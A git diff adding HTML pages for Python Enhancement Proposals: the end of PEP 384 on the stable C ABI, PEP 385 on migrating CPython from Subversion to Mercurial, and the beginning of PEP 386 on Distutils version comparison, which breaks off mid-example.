  • +
  • PyVarObject (ob_base, ob_size)
  • +
  • PyMethodDef (ml_name, ml_meth, ml_flags, ml_doc)
  • +
  • PyMemberDef (name, type, offset, flags, doc)
  • +
  • PyGetSetDef (name, get, set, doc, closure)
  • +
  • PyModuleDefBase (ob_base, m_init, m_index, m_copy)
  • +
  • PyModuleDef (m_base, m_name, m_doc, m_size, m_methods, m_traverse, +m_clear, m_free)
  • +
  • PyStructSequence_Field (name, doc)
  • +
  • PyStructSequence_Desc (name, doc, fields, sequence)
  • +
  • PyType_Slot (see below)
  • +
  • PyType_Spec (see below)
  • +
+

The accessor macros to these fields (Py_REFCNT, Py_TYPE, Py_SIZE) +are also available to applications.

+

The following types are available, but opaque (i.e. incomplete):

+
    +
  • PyThreadState
  • +
  • PyInterpreterState
  • +
  • struct _frame
  • +
  • struct symtable
  • +
  • struct _node
  • +
  • PyWeakReference
  • +
  • PyLongObject
  • +
  • PyTypeObject
  • +
+
+
+

Type Objects

+

The structure of type objects is not available to applications; +declaration of “static” type objects is not possible anymore +(for applications using this ABI). +Instead, type objects get created dynamically. To allow an +easy creation of types (in particular, to be able to fill out +function pointers easily), the following structures and functions +are available:

+
typedef struct{
+  int slot;    /* slot id, see below */
+  void *pfunc; /* function pointer */
+} PyType_Slot;
+
+typedef struct{
+  const char* name;
+  int basicsize;
+  int itemsize;
+  unsigned int flags;
+  PyType_Slot *slots; /* terminated by slot==0. */
+} PyType_Spec;
+
+PyObject* PyType_FromSpec(PyType_Spec*);
+
+
+

To specify a slot, a unique slot id must be provided. New Python +versions may introduce new slot ids, but slot ids will never be +recycled. Slots may get deprecated, but continue to be supported +throughout Python 3.x.

+

The slot ids are named like the field names of the structures that +hold the pointers in Python 3.1, with an added Py_ prefix (i.e. +Py_tp_dealloc instead of just tp_dealloc):

+
    +
  • tp_dealloc, tp_getattr, tp_setattr, tp_repr, +tp_hash, tp_call, tp_str, tp_getattro, tp_setattro, +tp_doc, tp_traverse, tp_clear, tp_richcompare, tp_iter, +tp_iternext, tp_methods, tp_base, tp_descr_get, tp_descr_set, +tp_init, tp_alloc, tp_new, tp_is_gc, tp_bases, tp_del
  • +
  • nb_add nb_subtract nb_multiply nb_remainder nb_divmod nb_power +nb_negative nb_positive nb_absolute nb_bool nb_invert nb_lshift +nb_rshift nb_and nb_xor nb_or nb_int nb_float nb_inplace_add +nb_inplace_subtract nb_inplace_multiply nb_inplace_remainder +nb_inplace_power nb_inplace_lshift nb_inplace_rshift nb_inplace_and +nb_inplace_xor nb_inplace_or nb_floor_divide nb_true_divide +nb_inplace_floor_divide nb_inplace_true_divide nb_index
  • +
  • sq_length sq_concat sq_repeat sq_item sq_ass_item +sq_contains sq_inplace_concat sq_inplace_repeat
  • +
  • mp_length mp_subscript mp_ass_subscript
  • +
+

The following fields cannot be set during type definition:

  • tp_dict tp_mro tp_cache tp_subclasses tp_weaklist tp_print
  • tp_weaklistoffset tp_dictoffset

+
+
+

typedefs

+

In addition to the typedefs for structs listed above, the following +typedefs are available. Their inclusion in the ABI means that the +underlying type must not change on a platform (even though it may +differ across platforms).

+
    +
  • Py_uintptr_t Py_intptr_t Py_ssize_t
  • +
  • unaryfunc binaryfunc ternaryfunc inquiry lenfunc ssizeargfunc +ssizessizeargfunc ssizeobjargproc ssizessizeobjargproc objobjargproc +objobjproc visitproc traverseproc +destructor getattrfunc getattrofunc setattrfunc setattrofunc reprfunc +hashfunc richcmpfunc getiterfunc iternextfunc descrgetfunc +descrsetfunc initproc newfunc allocfunc
  • +
  • PyCFunction PyCFunctionWithKeywords PyNoArgsFunction +PyCapsule_Destructor
  • +
  • getter setter
  • +
  • PyOS_sighandler_t
  • +
  • PyGILState_STATE
  • +
  • Py_UCS4
  • +
+

Most notably, Py_UNICODE is not available as a typedef, +since the same Python version may use different definitions +of it on the same platform (depending on whether it uses narrow +or wide code units). Applications that need to access the contents +of a Unicode string can convert it to wchar_t.

+
+
+

Functions and function-like Macros

+

By default, all functions are available, unless they are excluded +below. +Whether a function is documented or not does not matter.

+

Function-like macros (in particular, field access macros) remain available to applications, but get replaced by function calls (unless their definition only refers to features of the ABI, such as the various _Check macros).

+

ABI function declarations will not change their parameters or return types. If a change to the signature becomes necessary, a new function will be introduced. If the new function is source-compatible (e.g. if just the return type changes), an alias macro may get added to redirect calls to the new function when the application is recompiled.

+

If continued provision of the old function is not possible, it may get +deprecated, then removed, causing +applications that use that function to break.

+
+
+

Excluded Functions

+

All functions starting with _Py are not available to applications. +Also, all functions that expect parameter types that are unavailable +to applications are excluded from the ABI, such as PyAST_FromNode +(which expects a node*).

+

Functions declared in the following header files are not part +of the ABI:

+
    +
  • bytes_methods.h
  • +
  • cellobject.h
  • +
  • classobject.h
  • +
  • code.h
  • +
  • compile.h
  • +
  • datetime.h
  • +
  • dtoa.h
  • +
  • frameobject.h
  • +
  • funcobject.h
  • +
  • genobject.h
  • +
  • longintrepr.h
  • +
  • parsetok.h
  • +
  • pyarena.h
  • +
  • pyatomic.h
  • +
  • pyctype.h
  • +
  • pydebug.h
  • +
  • pytime.h
  • +
  • symtable.h
  • +
  • token.h
  • +
  • ucnhash.h
  • +
+

In addition, functions expecting FILE* are not part of +the ABI, to avoid depending on a specific version of the +Microsoft C runtime DLL on Windows.

+

Module and type initializer and finalizer functions are not available +(PyByteArray_Init, PyOS_FiniInterrupts +and all functions ending in _Fini or _ClearFreeList).

+

Several functions dealing with interpreter implementation +details are not available:

+
    +
  • PyInterpreterState_Head, PyInterpreterState_Next, +PyInterpreterState_ThreadHead, PyThreadState_Next
  • +
  • Py_SubversionRevision, Py_SubversionShortBranch
  • +
+

PyStructSequence_InitType is not available, as it requires +the caller to provide a static type object.

+

Py_FatalError will be moved from pydebug.h into some other +header file (e.g. pyerrors.h).

+

The exact list of functions being available is given +in the Windows module definition file for python3.dll [1].

+
+
+

Global Variables

+

Global variables representing types and exceptions are available +to applications. In addition, selected global variables referenced +in macros (such as Py_True and Py_False) are available.

+

A complete list of global variable definitions is given in the +python3.def file [1]; those declared DATA denote variables.

+
+
+

Other Macros

+

All macros defining symbolic constants are available to applications; +the numeric values will not change.

+

In addition, the following macros are available:

+
    +
  • Py_BEGIN_ALLOW_THREADS, Py_BLOCK_THREADS, Py_UNBLOCK_THREADS, +Py_END_ALLOW_THREADS
  • +
+
+
+

The Buffer Interface

+

The buffer interface (type Py_buffer, type slots bf_getbuffer and +bf_releasebuffer, etc) has been omitted from the ABI, since the stability +of the Py_buffer structure is not clear at this time. Inclusion in the +ABI can be considered in future releases.

+
+
+

Signature Changes

+

A number of functions currently expect a specific struct, even though +callers typically have PyObject* available. These have been changed +to expect PyObject* as the parameter; this will cause warnings in +applications that currently explicitly cast to the parameter type. +These functions are PySlice_GetIndices, PySlice_GetIndicesEx, +PyUnicode_AsWideChar, and PyEval_EvalCode.

+
+
+

Linkage

+

On Windows, applications shall link with python3.dll; an import +library python3.lib will be available. This DLL will redirect all of +its API functions through /export linker options to the full +interpreter DLL, i.e. python3y.dll.

+

On Unix systems, the ABI is typically provided by the python +executable itself. PyModule_Create is changed to pass 3 as the API +version if the extension module was compiled with Py_LIMITED_API; the +version check for the API version will accept either 3 or the current +PYTHON_API_VERSION as conforming. If Python is compiled as a shared +library, it is installed as both libpython3.so, and libpython3.y.so; +applications conforming to this PEP should then link to the former +(extension modules can continue to link with no libpython shared object, +but rather rely on runtime linking). +The ABI version is symbolically available as PYTHON_ABI_VERSION.

+

Also on Unix, the PEP 3149 tag abi<PYTHON_ABI_VERSION> is accepted +in file names of extension modules. No checking is performed that +files named in this way are actually restricted to the limited API, +and no support for building such files will be added to distutils +due to the distutils code freeze.

+
+
+
+

Implementation Strategy

+

This PEP will be implemented in a branch [2], allowing users to check +whether their modules conform to the ABI. To avoid users having to +rewrite their type definitions, a script to convert C source code +containing type definitions will be provided [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0384.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0385/index.html b/pep-0385/index.html new file mode 100644 index 00000000000..961dbcdfa05 --- /dev/null +++ b/pep-0385/index.html @@ -0,0 +1,572 @@ + PEP 385 – Migrating from Subversion to Mercurial | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 385 – Migrating from Subversion to Mercurial

+
+
Author:
+
Dirkjan Ochtman <dirkjan at ochtman.nl>, +Antoine Pitrou <solipsis at pitrou.net>, +Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
25-May-2009
+
+
+
+
Table of Contents +
+
+

Motivation

+

After having decided to switch to the Mercurial DVCS, the actual migration still has to be performed. In the case of an important piece of infrastructure like the version control system of a large, distributed project like Python, this is a significant effort. This PEP is an attempt to describe, for further discussion, the steps that must be taken. It’s somewhat similar to PEP 347, which discussed the migration to SVN.

+

To make the most of hg, we would like to make a high-fidelity +conversion, such that (a) as much of the svn metadata as possible is +retained, and (b) all metadata is converted to formats that are common +in Mercurial. This way, tools written for Mercurial can be optimally +used. In order to do this, we want to use the hgsubversion +software to do an initial conversion. This hg extension is focused on +providing high-quality conversion from Subversion to Mercurial for use +in two-way correspondence, meaning it doesn’t throw away as much +available metadata as other solutions.

+

Such a conversion also seems like a good time to reconsider the +contents of the repository and determine if some things are still +valuable. In this spirit, the following sections also propose +discarding some of the older metadata.

+
+
+

Timeline

+

The current schedule for conversion milestones:

+
    +
  • 2011-02-24: availability of a test repo at hg.python.org

    Test commits will be allowed (and encouraged) from all committers to +the Subversion repository. The test repository and all test commits +will be removed once the final conversion is done. The server-side +hooks will be installed for the test repository, in order to test +buildbot, diff-email and whitespace checking integration.

    +
  • +
  • 2011-03-05: final conversion (tentative)

    Commits to the Subversion branches now maintained in Mercurial will +be blocked. Developers should refrain from pushing to the Mercurial +repositories until all infrastructure is ensured to work after their +switch over to the new repository.

    +
  • +
+
+
+

Transition plan

+
+

Branch strategy

+

Mercurial has two basic ways of using branches: cloned branches, where +each branch is kept in a separate repository, and named branches, +where each revision keeps metadata to note on which branch it belongs. +The former makes it easier to distinguish branches, at the expense of +requiring more disk space on the client. The latter makes it a little +easier to switch between branches, but all branch names are a +persistent part of history. [1]

+

Differences between named branches and cloned branches:

+
    +
  • Tags in a different (maintenance) clone aren’t available in the +local clone
  • +
  • Clones with named branches will be larger, since they contain more +data
  • +
+

We propose to use named branches for release branches and adopt cloned +branches for feature branches.

+
+
+

History management

+

In order to minimize the loss of information due to the conversion, we +propose to provide several repositories as a conversion result:

+
    +
  • A repository trimmed to the mainline trunk (and py3k), as well as +past and present maintenance branches – this is called the +“working” repo and is where development continues. This repository has +all the history needed for development work, including annotating +source files with changes back up to 1990 and other common history-digging +operations.

    The default branch in that repo is what is known as py3k in +Subversion, while the Subversion trunk lives on with the branch name +legacy-trunk; however in Mercurial this branch will be closed. +Release branches are named after their major.minor version, e.g. 3.2.

    +
  • +
  • A repository with the full, unedited conversion of the Subversion +repository (actually, its /python subdirectory) – this is called +the “historic” or “archive” repo and will be offered as a read-only +resource. [2]
  • +
  • One more repository per active feature branch; “active” means that +at least one core developer asks for the branch to be provided. Each +such repository will contain both the feature branch and all ancestor +changesets from mainline (coming from trunk and/or py3k in SVN).
  • +
+

Since all branches are present in the historic repo, they can later be +extracted as separate repositories at any time should it prove to be +necessary.

+

The final revision map between SVN revision numbers, Mercurial changesets and SVN branch names will be made available in a file stored in the Misc directory. Its format is as follows:

+
[...]
+88483 e65daae6cf4499a0863cb7645109a4798c28d83e issue10276-snowleopard
+88484 835cb57abffeceaff0d85c2a3aa0625458dd3e31 py3k
+88485 d880f9d8492f597a030772c7485a34aadb6c4ece release32-maint
+88486 0c431b8c22f5dbeb591414c154acb7890c1809df py3k
+88487 82cda1f21396bbd10db8083ea20146d296cb630b release32-maint
+88488 8174d00d07972d6f109ed57efca8273a4d59302c release27-maint
+[...]
+
+
+
+
+

Converting tags

+

The SVN tags directory contains a lot of old stuff. Some of these are +not, in fact, full tags, but contain only a smaller subset of the +repository. All release tags will be kept; other tags will be +included based on requests from the developer community. We propose +to make the tag naming scheme consistent, in this style: v3.2.1a2.

+
+
+

Author map

+

In order to provide user names the way they are common in hg (in the +‘First Last <user@example.org>’ format), we need an author map to map +cvs and svn user names to real names and their email addresses. We +have a complete version of such a map in the migration tools +repository (not publicly accessible to avoid leaking addresses to +harvesters). The email addresses in it might be out of date; that’s +bound to happen, although it would be nice to try and have as many +people as possible review it for addresses that are out of date. The +current version also still seems to contain some encoding problems.

+
+
+

Generating .hgignore

+

The .hgignore file can be used in Mercurial repositories to help +ignore files that are not eligible for version control. It does this +by employing several possible forms of pattern matching. The current +Python repository already includes a rudimentary .hgignore file to +help with using the hg mirrors.

+

Since the current Python repository already includes a .hgignore file +(for use with hg mirrors), we’ll just use that. Generating full +history of the file was debated but deemed impractical (because it’s +relatively hard with fairly little gain, since ignoring is less +important for older revisions).

+
+
+

Repository size

+

A bare conversion result of the current Python repository weighs 1.9 GB; although this is smaller than the Subversion repository (2.7 GB), it is still too large to be practical.

+

The size becomes more manageable by the trimming applied to the +working repository, and by a process called “revlog reordering” that +optimizes the layout of internal Mercurial storage very efficiently.

+

After all optimizations are done, the size of the working repository is around 180 MB on disk. The amount of data transferred over the network when cloning is estimated to be around 80 MB.

+
+
+

Other repositories

+

There are a number of other projects hosted in svn.python.org’s +“projects” repository. The “peps” directory will be converted along +with the main Python one. Richard Tew has indicated that he’d like the +Stackless repository to also be converted. What other projects in the +svn.python.org repository should be converted?

+

There’s now an initial stab at converting the Jython repository. The +current tip of hgsubversion unfortunately fails at some point. +Pending investigation.

+

Other repositories that would like to be converted to Mercurial can announce themselves to me after the main Python migration is done, and I’ll take care of their needs.

+
+
+
+

Infrastructure

+
+

hg-ssh

+

Developers should access the repositories through ssh, similar to the +current setup. Public keys can be used to grant people access to a +shared hg@ account. A hgwebdir instance also has been set up at +hg.python.org for easy browsing and read-only access. It is +configured so that developers can trivially start new clones (for +longer-term features that profit from development in a separate +repository).

+

Also, direct creation of public repositories is allowed for core developers, +although it is not yet decided which naming scheme will be enforced:

+
$ hg init ssh://hg@hg.python.org/sandbox/mywork
+repo created, public URL is http://hg.python.org/sandbox/mywork
+
+
+
+
+

Hooks

+

A number of hooks are currently in use. The hg equivalents for these should be developed and deployed. The following hooks are being used:

+
    +
  • check whitespace: a hook to reject commits in case the whitespace +doesn’t match the rules for the Python codebase. In a changegroup, +only the tip is checked (this allows cleanup commits for changes +pulled from third-party repos). We can also offer a whitespace hook +for use with client-side repositories that people can use; it could +either warn about whitespace issues and/or truncate trailing +whitespace from changed lines.
  • +
  • push mails: Emails will include diffs for each changeset pushed +to the public repository, including the username which pushed the +changesets (this is not necessarily the same as the author recorded +in the changesets).
  • +
  • buildbots: the python.org build master will be notified of each changeset +pushed to the cpython repository, and will trigger an appropriate build +on every build slave for the branch in which the changeset occurs.
  • +
+

The hooks repository contains ports of these server-side hooks to Mercurial, as well as a couple of additional ones:

+
    +
  • check branch heads: a hook to reject pushes which create a new head on +an existing branch. The pusher then has to merge the excess heads +and try pushing again.
  • +
  • check branches: a hook to reject all changesets not on an allowed named +branch. This hook’s whitelist will have to be updated when we want to +create new maintenance branches.
  • +
  • check line endings: a hook, based on the eol extension, to reject all changesets committing files with the wrong line endings. The commits then have to be stripped and redone, possibly with the eol extension enabled on the committer’s computer.
  • +
+

One additional hook could be beneficial:

+
    +
  • check contributors: in the current setup, all changesets bear the +username of committers, who must have signed the contributor +agreement. We might want to use a hook to check if the committer is +a contributor if we keep a list of registered contributors. Then, +the hook might warn users that push a group of revisions containing +changesets from unknown contributors.
  • +
+
+
+

End-of-line conversions

+

Discussion about the lack of end-of-line conversion support in +Mercurial, which was provided initially by the win32text extension, +led to the development of the new eol extension that supports a +versioned management of line-ending conventions on a file-by-file +basis, akin to Subversion’s svn:eol-style properties. This +information is kept in a versioned file called .hgeol, and such a +file has already been checked into the Subversion repository.

+

A hook also exists on the server side to reject any changeset +introducing inconsistent newline data (see above).

+
+
+

hgwebdir

+

A more or less stock hgwebdir installation should be set up. We might +want to come up with a style to match the Python website.

+

A small WSGI application has been written that can look up +Subversion revisions and redirect to the appropriate hgweb page for +the given changeset, regardless in which repository the converted +revision ended up (since one big Subversion repository is converted +into several Mercurial repositories). It can also look up Mercurial +changesets by their hexadecimal ID.

+
+
+

roundup

+

By pointing Roundup to the URL of the lookup script mentioned above, +links to SVN revisions will continue to work, and links to Mercurial +changesets can be created as well, without having to give repository +and changeset ID.

+
+
+
+

After migration

+
+

Where to get code

+

After migration, the hgwebdir will live at hg.python.org. This is an +accepted standard for many organizations, and an easy parallel to +svn.python.org. The working repo might live at +http://hg.python.org/cpython/, for example, with the archive repo at +http://hg.python.org/cpython-archive/. For write access, developers +will have to use ssh, which could be ssh://hg@hg.python.org/cpython/.

+

code.python.org was also proposed as the hostname. We think that +using the VCS name in the hostname is good because it prevents +confusion: it should be clear that you can’t use svn or bzr for +hg.python.org.

+

hgwebdir can already provide tarballs for every changeset. This +obviates the need for daily snapshots; we can just point users to +tip.tar.gz instead, meaning they will get the latest. If desired, we +could even use buildbot results to point to the last good changeset.

+
+
+

Python-specific documentation

+

hg comes with good built-in documentation (available through hg help) +and a wiki that’s full of useful information and recipes, not to +mention a popular book (readable online).

+

In addition to that, the recently overhauled Python Developer’s +Guide already has a branch with instructions for Mercurial instead +of Subversion; an online build of this branch is also available.

+
+
+

Proposed workflow

+

We propose two workflows for the migration of patches between several +branches.

+

For migration within 2.x or 3.x branches, we propose a patch always +gets committed to the oldest branch where it applies first. Then, the +resulting changeset can be merged using hg merge to all newer branches +within that series (2.x or 3.x). If it does not apply as-is to the +newer branch, hg revert can be used to easily revert to the +new-branch-native head, patch in some alternative version of the patch +(or none, if it’s not applicable), then commit the merge. The premise +here is that all changesets from an older branch within the series are +eventually merged to all newer branches within the series.

+

The upshot is that this provides for the most painless merging +procedure. This means that in the general case, people have to think +about the oldest branch to which the patch should be applied before +actually applying it. Usually, that is one of only two branches: the +latest maintenance branch and the trunk, except for security fixes +applicable to older branches in security-fix-only mode.

+

For merging bug fixes from the 3.x to the 2.7 maintenance branch (2.6 +and 2.5 are in security-fix-only mode and their maintenance will +continue in the Subversion repository), changesets should be +transplanted (not merged) in some other way. The transplant +extension, import/export and bundle/unbundle work equally well here.

+

Choosing this approach allows 3.x not to carry all of the 2.x +history-since-it-was-branched, meaning the clone is not as big and the +merges not as complicated.

+
+
+

The future of Subversion

+

What happens to the Subversion repositories after the migration? +Since the svn server contains a bunch of repositories, not just the +CPython one, it will probably live on for a bit as not every project +may want to migrate or it takes longer for other projects to migrate. +To prevent people from staying behind, we may want to move migrated +projects from the repository to a new, read-only repository with a new +name.

+
+
+

Build identification

+

Python currently provides the sys.subversion tuple to allow Python +code to find out exactly what version of Python it’s running against. +The current version looks something like this:

+
    +
  • (‘CPython’, ‘tags/r262’, ‘71600’)
  • +
  • (‘CPython’, ‘trunk’, ‘73128M’)
  • +
+

Another value is returned from Py_GetBuildInfo() in the C API, and +available to Python code as part of sys.version:

+
    +
  • ‘r262:71600, Jun 2 2009, 09:58:33’
  • +
  • ‘trunk:73128M, Jun 2 2009, 01:24:14’
  • +
+

I propose that the revision identifier will be the short version of +hg’s revision hash, for example ‘dd3ebf81af43’, augmented with ‘+’ +(instead of ‘M’) if the working directory from which it was built was +modified. This mirrors the output of the hg id command, which is +intended for this kind of usage. The sys.subversion value will also +be renamed to sys.mercurial to reflect the change in VCS.

+

For the tag/branch identifier, I propose that hg will check for tags on the currently checked out revision, use the tag if there is one (‘tip’ doesn’t count), and use the branch name otherwise. sys.subversion becomes

+
    +
  • (‘CPython’, ‘v2.6.2’, ‘dd3ebf81af43’)
  • +
  • (‘CPython’, ‘default’, ‘af694c6a888c+’)
  • +
+

and the build info string becomes

+
    +
  • ‘v2.6.2:dd3ebf81af43, Jun 2 2009, 09:58:33’
  • +
  • ‘default:af694c6a888c+, Jun 2 2009, 01:24:14’
  • +
+

This reflects that the default branch in hg is called ‘default’ +instead of Subversion’s ‘trunk’, and reflects the proposed new tag +format.

+

Mercurial also allows finding out the latest tag and the number of changesets separating the current changeset from that tag, allowing for a descriptive version string:

+
$ hg parent --template "{latesttag}+{latesttagdistance}-{node|short}\n"
+v3.2+37-4b5d0d260e72
+$ hg up 2.7
+3316 files updated, 0 files merged, 379 files removed, 0 files unresolved
+$ hg parent --template "{latesttag}+{latesttagdistance}-{node|short}\n"
+v2.7.1+216-9619d21d8198
+
+
+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0385.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0386/index.html b/pep-0386/index.html new file mode 100644 index 00000000000..a02dc9749f3 --- /dev/null +++ b/pep-0386/index.html @@ -0,0 +1,621 @@ + PEP 386 – Changing the version comparison module in Distutils | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 386 – Changing the version comparison module in Distutils

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-Jun-2009
+
Superseded-By:
+
440
+
+
+
+
Table of Contents +
+
+

Abstract

+

Note: This PEP has been superseded by the version identification and +dependency specification scheme defined in PEP 440.

+

This PEP proposed a new version comparison schema for Distutils.

+
+
+

Motivation

+

In Python there are no real restrictions yet on how a project should manage its +versions, and how they should be incremented.

+

Distutils provides a version distribution metadata field, but it is freeform, and current consumers such as PyPI usually treat the most recently pushed version as the latest one, regardless of the expected semantics.

+

Distutils will soon extend its capabilities to allow distributions to express a dependency on other distributions through the Requires-Dist metadata field (see PEP 345), and it will optionally allow use of that field to restrict the dependency to a set of compatible versions. Notice that this field replaces Requires, which expressed dependencies on modules and packages.

+

The Requires-Dist field will allow a distribution to define a dependency on +another package and optionally restrict this dependency to a set of +compatible versions, so one may write:

+
Requires-Dist: zope.interface (>3.5.0)
+
+
+

This means that the distribution requires zope.interface with a version +greater than 3.5.0.

+

This also means that Python projects will need to follow the same convention +as the tool that will be used to install them, so they are able to compare +versions.

+

That is why this PEP proposes, for the sake of interoperability, a standard +schema to express version information and its comparison semantics.

+

Furthermore, this will make OS packagers’ work easier when repackaging standards +compliant distributions, because as of now it can be difficult to decide how two +distribution versions compare.

+
+
+

Requisites and current status

+

It is not in the scope of this PEP to provide a universal versioning schema +intended to support all or even most of existing versioning schemas. There +will always be competing grammars, either mandated by distro or project +policies or by historical reasons that we cannot expect to change.

+

The proposed schema should be able to express the usual versioning semantics, so it’s possible to parse any alternative versioning schema and transform it into a compliant one. This is how OS packagers usually deal with the existing version schemas, and it is a preferable alternative to supporting an arbitrary set of versioning schemas.

+

Conformance to usual practice and conventions, as well as simplicity, is a plus, to ease frictionless adoption and painless transition. Practicality beats purity, sometimes.

+

Projects have very different versioning needs, but the following are widely +considered important semantics:

+
  1. it should be possible to express more than one versioning level (usually this is expressed as major and minor revision and, sometimes, also a micro revision).
  2. a significant number of projects need special meaning versions for “pre-releases” (such as “alpha”, “beta”, “rc”), and these have widely used aliases (“a” stands for “alpha”, “b” for “beta” and “c” for “rc”). And these pre-release versions make it impossible to use a simple alphanumerical ordering of the version string components. (Example: 3.1a1 < 3.1)
  3. some projects also need “post-releases” of regular versions, mainly for installer work which can’t be clearly expressed otherwise.
  4. development versions allow packagers of unreleased work to avoid version clash with later regular releases.
+

For people that want to go further and use a tool to manage their version +numbers, the two major ones are:

+
    +
  • The current Distutils system [1]
  • +
  • Setuptools [2]
  • +
+
+

Distutils

+

Distutils currently provides a StrictVersion and a LooseVersion class +that can be used to manage versions.

+

The LooseVersion class is quite lax. From Distutils doc:

+
Version numbering for anarchists and software realists.
+Implements the standard interface for version number classes as
+described above.  A version number consists of a series of numbers,
+separated by either periods or strings of letters.  When comparing
+version numbers, the numeric components will be compared
+numerically, and the alphabetic components lexically.  The following
+are all valid version numbers, in no particular order:
+
+    1.5.1
+    1.5.2b2
+    161
+    3.10a
+    8.02
+    3.4j
+    1996.07.12
+    3.2.pl0
+    3.1.1.6
+    2g6
+    11g
+    0.960923
+    2.2beta29
+    1.13++
+    5.5.kw
+    2.0b1pl0
+
+In fact, there is no such thing as an invalid version number under
+this scheme; the rules for comparison are simple and predictable,
+but may not always give the results you want (for some definition
+of "want").
+
+
+

This class makes any version string valid, and provides an algorithm to sort +them numerically then lexically. It means that anything can be used to version +your project:

+
>>> from distutils.version import LooseVersion as V
+>>> v1 = V('FunkyVersion')
+>>> v2 = V('GroovieVersion')
+>>> v1 > v2
+False
+
+
+

The problem with this is that, while it allows expressing any nesting level, it doesn’t allow giving special meaning to versions (pre- and post-releases as well as development versions), as expressed in requisites 2, 3 and 4.

+

The StrictVersion class is more strict. From the doc:

+
Version numbering for meticulous retentive and software idealists.
+Implements the standard interface for version number classes as
+described above.  A version number consists of two or three
+dot-separated numeric components, with an optional "pre-release" tag
+on the end.  The pre-release tag consists of the letter 'a' or 'b'
+followed by a number.  If the numeric components of two version
+numbers are equal, then one with a pre-release tag will always
+be deemed earlier (lesser) than one without.
+
+The following are valid version numbers (shown in the order that
+would be obtained by sorting according to the supplied cmp function):
+
+    0.4       0.4.0  (these two are equivalent)
+    0.4.1
+    0.5a1
+    0.5b3
+    0.5
+    0.9.6
+    1.0
+    1.0.4a3
+    1.0.4b1
+    1.0.4
+
+The following are examples of invalid version numbers:
+
+    1
+    2.7.2.2
+    1.3.a4
+    1.3pl1
+    1.3c4
+
+
+

This class enforces a few rules, and makes a decent tool to work with version +numbers:

+
>>> from distutils.version import StrictVersion as V
+>>> v2 = V('GroovieVersion')
+Traceback (most recent call last):
+...
+ValueError: invalid version number 'GroovieVersion'
+>>> v2 = V('1.1')
+>>> v3 = V('1.3')
+>>> v2 < v3
+True
+
+
+

It adds pre-release versions, and some structure, but lacks a few semantic +elements to make it usable, such as development releases or post-release tags, +as expressed in requisites 3 and 4.

+

Also, note that Distutils version classes have been present for years +but are not really used in the community.

+
+
+

Setuptools

+

Setuptools provides another version comparison tool [3] +which does not enforce any rules for the version, but tries to provide a better +algorithm to convert the strings to sortable keys, with a parse_version +function.

+

From the doc:

+
Convert a version string to a chronologically-sortable key
+
+This is a rough cross between Distutils' StrictVersion and LooseVersion;
+if you give it versions that would work with StrictVersion, then it behaves
+the same; otherwise it acts like a slightly-smarter LooseVersion. It is
+*possible* to create pathological version coding schemes that will fool
+this parser, but they should be very rare in practice.
+
+The returned value will be a tuple of strings.  Numeric portions of the
+version are padded to 8 digits so they will compare numerically, but
+without relying on how numbers compare relative to strings.  Dots are
+dropped, but dashes are retained.  Trailing zeros between alpha segments
+or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
+"2.4". Alphanumeric parts are lower-cased.
+
+The algorithm assumes that strings like "-" and any alpha string that
+alphabetically follows "final"  represents a "patch level".  So, "2.4-1"
+is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
+considered newer than "2.4-1", which in turn is newer than "2.4".
+
+Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
+come before "final" alphabetically) are assumed to be pre-release versions,
+so that the version "2.4" is considered newer than "2.4a1".
+
+Finally, to handle miscellaneous cases, the strings "pre", "preview", and
+"rc" are treated as if they were "c", i.e. as though they were release
+candidates, and therefore are not as new as a version string that does not
+contain them, and "dev" is replaced with an '@' so that it sorts lower
+than any other pre-release tag.
+
+
+

In other words, parse_version will return a tuple for each version string that is compatible with StrictVersion, but it also accepts arbitrary versions and deals with them so they can be compared:

+
>>> from pkg_resources import parse_version as V
+>>> V('1.2')
+('00000001', '00000002', '*final')
+>>> V('1.2b2')
+('00000001', '00000002', '*b', '00000002', '*final')
+>>> V('FunkyVersion')
+('*funkyversion', '*final')
+
+
+

In this schema practicality takes priority over purity, but as a result it +doesn’t enforce any policy and leads to very complex semantics due to the lack +of a clear standard. It just tries to adapt to widely used conventions.

+
+
+

Caveats of existing systems

+

The major problem with the described version comparison tools is that they are +too permissive and, at the same time, aren’t capable of expressing some of the +required semantics. Many of the versions on PyPI [4] are obviously not +useful versions, which makes it difficult for users to grok the versioning that +a particular package was using and to provide tools on top of PyPI.

+

Distutils classes are not really used in Python projects, but the +Setuptools function is quite widespread because it’s used by tools like +easy_install [6], pip [5] or zc.buildout +[7] to install dependencies of a given project.

+

While Setuptools does provide a mechanism for comparing/sorting versions, +it is much preferable if the versioning spec is such that a human can make a +reasonable attempt at that sorting without having to run it against some code.

+

Also, there’s a problem with using dates as the “major” version number (e.g. a version string “20090421”) with RPMs: any later attempt to switch to a more typical “major.minor…” version scheme is problematic because it will always sort less than “20090421”.

+

Last, the meaning of - is specific to Setuptools, while it is avoided in +some packaging systems like the one used by Debian or Ubuntu.

+
+
+
+

The new versioning algorithm

+

During Pycon, members of the Python, Ubuntu and Fedora communities worked on a version standard that would be acceptable for everyone.

+

It’s currently called verlib and a prototype lives at [9].

+

The pseudo-format supported is:

+
N.N[.N]+[{a|b|c|rc}N[.N]+][.postN][.devN]
+
+
+

The real regular expression is:

+
expr = r"""^
+(?P<version>\d+\.\d+)         # minimum 'N.N'
+(?P<extraversion>(?:\.\d+)*)  # any number of extra '.N' segments
+(?:
+    (?P<prerel>[abc]|rc)         # 'a' = alpha, 'b' = beta
+                                 # 'c' or 'rc' = release candidate
+    (?P<prerelversion>\d+(?:\.\d+)*)
+)?
+(?P<postdev>(\.post(?P<post>\d+))?(\.dev(?P<dev>\d+))?)?
+$"""
+
+
+
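
The expression is written for verbose mode; as a quick sanity check (a sketch, not part of verlib itself), it can be compiled with re.VERBOSE and applied directly:

+
import re
+
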